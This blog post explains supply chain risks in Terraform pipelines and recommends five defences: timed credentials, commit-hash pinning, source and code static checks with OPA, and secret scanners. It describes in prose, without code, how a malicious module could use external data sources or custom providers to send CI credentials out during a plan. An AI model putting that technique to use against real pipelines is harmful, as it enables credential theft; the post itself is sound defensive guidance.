Why you should care about your Terraform Supply Chain

And 5 things you can do to improve your security posture

Yoriyasu Yano
Fensak Blog

--

Thanks to the proliferation of open source software and easily accessible distribution channels like GitHub, it is almost impossible not to build software without depending on a large number of third party libraries.

However, as relying on third party open source software becomes the norm, it becomes increasingly more difficult to review the dependencies that you pull in.

When was the last time you took a look at the source code of the different dependencies you are using? How about the transitive dependencies that your direct dependencies pull in? And have you thought about who might be behind some of the software you use? Reviewing and vetting every dependency in your chain is practically impossible.

In this post I want to cover some of the risks of ignoring the software supply chain, especially when it comes to Terraform modules, and some of the things you can do to improve your security posture without having to review and vet every line of code in your dependencies.

Risks of the Software Supply Chain

There is a real risk of having vulnerable or malicious software infecting your final package through your dependencies. There have been a few high profile supply chain exploits in the past (ua-parser-js package hijacking, npm typosquatting, and Solarwinds to name a few). In each of these cases, a malicious actor was able to spread the effects of their exploits by taking advantage of automated processes in software delivery.

The potential damage that can be done through an infected IaC package is orders of magnitude bigger than application code, due to the privileged access levels that IaC pipelines require (to deploy arbitrary infrastructure, you need arbitrary access to the cloud platform).

Consider a typical automated deployment process with Dependabot or Renovate, where your Org automatically updates dependencies. These tools are designed to react to released software packages and open PRs in downstream repos that reference the package. Typically, you protect these changes by having a process of CI to test the changes before merging them in.

In most cases, the CI process you have should be able to detect suspicious behaviors, especially in application code. This is because you typically run application level CI builds and tests in isolated environments with no credentials.

However, with infrastructure code, the amount of validation and testing you can do in isolated environments is limited. As such, it is typical for the pipeline to have full range cloud access to a test environment at a minimum. This could lead to unintentional leaks depending on the extent of your CI process.

A typical CI test scenario with infrastructure code is a validate -> plan -> apply pipeline. In this pipeline, your CI test consists of a validation phase for structural checks in the code, followed by a dry run (e.g., terraform plan), and then the actual deployment when approved and merged. You may also have a more sophisticated pipeline involving integration tests with a tool like kitchen-terraform or terratest.

For honest code, this is an effective pipeline for detecting bugs and potential issues in production. However, for malicious code, this can be risky, since both plan and test require access to a cloud environment to test/deploy your code.

Intuitively, a plan feels safe since by definition it is a "dry run" of your code where it doesn't make any changes. What most people neglect is that there are two escape hatches built into Terraform that allows arbitrary code execution even in plan:

  • external data sources: external data sources allow arbitrary execution of shell code during the plan phase. A malicious actor could use curl in the external data source to ship environment variables to an unknown location.
  • Custom providers: Custom providers are by definition, custom code. Malicious actors can run any code in the provider regardless of the phase of execution.

What if a malicious actor gets a hold of one of your dependent Terraform modules, and is able to sneak in malicious code that gets released as a patch version update? And what if your Dependabot or Renovate pipeline pulls that in and you execute a plan on it? Would your current pipeline be able to detect such a change, before any damage is done?

And don’t underestimate the damage that could be done with leaked credentials in a test account. These attackers typically harvest open cloud account credentials to deploy various bots, such as a DDoS agent or crypto mining, which could greatly impact your cloud bill, and possibly your reputation within the vendor.

Note also that this isn’t only exploited by rogue package maintainers or internal threats. Recently, GitHub had a vulnerability that leaked oauth credentials), and these credentials could have easily been exploited to manipulate your private trusted libraries, which typically have less scrutiny than open source dependencies. Usually it only takes one compromised account with write access to trigger a vulnerable pipeline (e.g., open a PR from a branch and then immediately close it).

Organizations have begun to address this problem, primarily for application code. You may have come across solutions like the SLSA framework being developed by Google, the Open Source Security Foundation, and Chainguard amongst others. These techniques are being employed by the largest and most popular orgs and dependencies to improve the security posture of the open source dependencies. Each of these attempt to address the problem by providing a framework for securely and automatically enforcing certain rules as you pull down your dependencies.

On the other hand, there isn’t much development that has happened in the Terraform world to address this. This is especially true for module code, where you don’t have the benefit of package management like you do with providers (Terraform implements a lock file for providers, but not for modules).

So what can you do to mitigate the risks without first party help?

Mitigating the risks in Terraform

There are a number of things you can do to improve the security posture of your Terraform pipeline with respect to the supply chain. Here I will list a few of the low hanging fruits that you should be able to employ with minimal overhead. Note that I will focus mainly on things you can do as a Terraform module user. In a future post, I will cover some things Terraform module maintainers can do to protect their users from potential attacks against their supply chain.

NOTE

When reviewing these recommendation, it is important to be aware that with all things security, many recommendations are targeting specific aspects of the problem. Each of these by itself may not provide much coverage and may have certain exploitable flaws (see the caveats of each solution), but when combined together, they can drastically improve the security posture. Always practice defense in depth.

Solution 1: Use timed credentials

The first solution is to use timed credentials whenever you need privileged access. For example, for AWS access in GitHub Actions, you can use OIDC based access to get a timed access token.

This can limit the damage done through a credential mining attack, where a vulnerable software package exports access credentials from your CI pipeline to the attacker (e.g., through a custom provider or external data source). The goal is that by the time the attacker has access to the credentials, they are no longer valid and thus they can’t do anything to your account.

Some caveats:

  • If the credentials are privileged enough (which is often the case in IaC pipelines), this is easily worked around by the attacker by creating IAM roles or Users that the attacker can access instead of extraditing credentials.
  • Not every app or cloud that you need to provision supports timed credentials.

Using timed credentials is not a perfect solution to protecting your credentials, but it offers a first line of defense that mitigates some of the common attack vectors.

Solution 2: Rely on commit hashes as opposed to tags

In Terraform, it is commonplace to rely on version tags when pulling in module code. For example, if you are using the vpc module from terraform-aws-modules, you might write your reference as

module "vpc" {
source = "terraform-aws-modules/vpc/aws"
version = "5.1.2"
}

Or when pulling from GitHub directly:

module "vpc" {
source = "github.com/terraform-aws-modules/terraform-aws-vpc?ref=v5.1.2"
}

The problem with version tags is that while they provide semantic significance and make your code readable, it is extremely easy to exploit the semantic version. Git tags are aliases to the commit hash, which means that they can point to any commit on any branch. A malicious actor could push code to an unprotected branch, and push a tag that points to it, which could be picked up by the automated release processes.

Or worse, the tag can be changed. A malicious actor could move an existing tag to point to a different commit at a later point in time. You could unsuspectedly pull in malicious modules without changing anything in your code!

NOTE

The Public Terraform Registry is a pass through to the underlying GitHub repository and it doesn’t store an artifact on the platform. When you make a request through the registry, it returns the git URL for cloning the package at the requested ref. As such, the Registry is just as vulnerable to a release tag munging attack as GitHub is.

As an alternative, you could use the associated commit SHA of the tag directly. This trades off the semantic readability with the assurance that you are always pulling the exact commit ref you expect. You could even keep things readable by adding a comment to indicate the version ref, like so:

module "vpc" {
source = "github.com/terraform-aws-modules/terraform-aws-vpc?ref=bf9a89b" # v5.1.2
}

This way, even if the tag is updated, your code would still work to pull the original reference. This technique is similar to the recommended way you should reference third party GitHub Actions.

Some caveats:

  • You will need to pull the module directly from git if you wish to use this approach. The Terraform Registry doesn’t have support for directly pulling the commit SHA. This may not be possible if you have other downstream policies that enforce a restricted list of sources.
  • Commit SHAs can also be mutable if there is no branch protection. For example, an admin level credential can be used to force push to a protected branch to remove commits by turning off branch protection. However, the level of access required to do this is typically much higher in most organizations, especially when compared to munging release tags. Additionally, it is much harder to hijack a commit SHA to point to alternative code, which means the worst that could happen is that the module is no longer available.
  • Relying on commit SHAs could increase the risk of the human factor due to increased cognitive load. E.g., the load of reviewing version bumps may be higher as now you need to make sure the commit SHA is referring to a release tag instead of a random commit. This could play out both ways. On one hand, the increased load may encourage developers to carefully review every dependency update to make sure the ref refers to a release tag and protected branch. On the other hand, the increased load may make it less likely for developers to do this due to the increased friction. How this plays out will be dependent on the team. You can mitigate some of the harmful effects by employing one of the other practices down below.

Despite these caveats, using commit SHAs provides a baseline level of protection by guaranteeing you are always pulling the same module version code, and with good discipline, offers no semantic difference with using regular version tags.

Solution 3: Add static checks for your dependency sources

In addition to, or in place of relying on commit SHAs, you can employ static analysis against the Terraform code to vet your sources.

For example, using the terraform-config-inspect go library, you can collect a list of Terraform module dependencies and check each one to make sure that:

  • The ref refers to a semantic version tag.
  • The referred commit is associated with the expected release branch.
  • The expected release branch is protected.

This routine can be embedded in a unit test using the Terratest framework, or implemented as a CLI based linter that runs prior to running terraform plan. This way, you vet the dependencies before any code is executed.

Some caveats:

  • The check code can get complex, and will require some hardening to ensure it is testing the right thing.
  • This depends on securing your workflow to ensure that a malicious actor can’t manipulate the pipeline. Most pipelines depend on workflow files defined on a branch, so you will want to make sure that the workflow file can’t be easily updated to skip the static validation step. For example, GitHub Actions has several protection mechanismsthat prevent arbitrarily updating the pipeline.

If pulled off well, this check can offer a stronger guarantee than using just the commit SHA for the references, as you can bake in arbitrary conditions to enhance your confidence that the code you are pulling in is trusted.

Solution 4: Add static checks to validate the pulled in Terraform code

The last two approaches are ways to ensure your Terraform dependencies are stable and can’t be easily manipulated. The last recommendation was a static check on the metadata about the source, but this recommendation goes one step further to add static checks to the Terraform code in the dependency.

You may be familiar with Terraform policy enforcement tools like OPA, Sentinel, or Checkov. The canonical use cases for these are to enforce policies on the plan output, and thus are run after damage may already have been done. Running against the plan is necessary for certain policies to be enforced as they may depend on computed values which require running the Terraform code.

However, there are ways to use the same tools to run static analysis on the Terraform code itself, even before a plan is executed. This can be useful to enforce a set of simple, yet powerful checks that ensure the safety of the code being pulled in.

For example, here is a way to use OPA to enforce that your Terraform code only includes resources from an approved allowlist of providers:

  1. Run terraform init. This pulls down all the modules, including transitive ones, so that they are available locally for analysis.
  2. Use hcl2json to convert all the terraform code to JSON format.
  3. Write an OPA policy that will ensure that all the resources and data sources in use in every module is from one of the allowed provider list.

The main advantage of such checks is to ensure that the code isn’t capable of doing anything arbitrary or harmful at the plan phase. By checking only against the source code, you can catch potential issues even before the pipeline runs plan.

Some caveats:

  • Like with the checks for the source refs, you will want to make sure that the pipeline is locked down so that these checks can’t be bypassed.
  • Depending on what you want to check, the rules can get very complicated and hard to maintain over time. You will need to strike the right balance.

Unlike the other solutions, this check has the advantage that it scans the actual code instead of the references, so it doesn’t matter if the attacker was able to sneak in the code through the pipeline. However, the success of the detection mechanism depends on the quality of the check itself, which can become difficult to test and maintain over time.

Solution 5: Prevent secrets from leaking with automated scanners

Up to this point I focused on Terraform code, but an important aspect of keeping your supply chain secure is to prevent credentials from leaking in the first place.

While it’s difficult to prevent credential leaks from third parties (as in the case of the GitHub OAuth exploit), you could implement scanners that ensure that you don’t leak your credentials in your repositories and published artifacts.

Here are a list of secrets scanners that focus on detecting if a software artifact contains secrets:

Employing these scanners in your pipeline greatly reduces the risk of developer credentials being leaked and exploited.

Some caveats:

  • These scanners will only prevent accidental leakage of credentials through your distribution channels. It will not prevent third parties from accidentally leaking your credentials (e.g., if a third party GitHub app with access to your org is compromised).
  • The scanners are only checks. That is, they are not a mechanism to prevent secrets from being pushed upstream. So developers may still accidentally leak credentials by pushing to a public branch and that may go undetected for a long time if no PR is ever opened. It still requires some level of developer discipline to ensure the scanners are run at the pre-commit phase locally.

Summary

Supply chain security of your Terraform code is just as important as the supply chain security of your application code. Even if there isn’t a lot of first party support from HashiCorp for mitigating supply chain vulnerabilities, there are many things you can do to mitigate those risks as covered above.

Hopefully this gave you some ideas on approaches to improving your security posture. Thanks for reading!

--

--

Staff level Startup Engineer with 10+ years experience (formerly at Gruntwork)